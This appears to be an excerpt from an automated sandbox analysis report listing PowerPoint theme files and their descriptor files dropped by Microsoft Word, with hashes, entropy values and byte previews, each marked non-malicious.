                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                                                                                                                                                                                                                                          MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                                                                                                                                                                                                                                          SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):276
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5361139545278144
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):777647
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.689662652914981
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                                                                                                                                                                                                                                          MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):290
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5091498509646044
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):486596
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.668294441507828
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                                                                                                                                                                                                                                          MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):274
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.535303979138867
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):924687
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.824849396154325
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                                                                                                                                                                                                                                          MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):282
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.51145753448333
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):608122
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.729143855239127
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                                                                                                                                                                                                                                          MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                                                                                                                                                                                                                                          SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):278
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.516359852766808
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):976001
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.791956689344336
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                                                                                                                                                                                                                                          MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):278
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5270134268591966
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1204049
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.92476783994848
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                                                                                                                                                                                                                                          MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):276
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5364757859412563
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                                                                                                                          MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
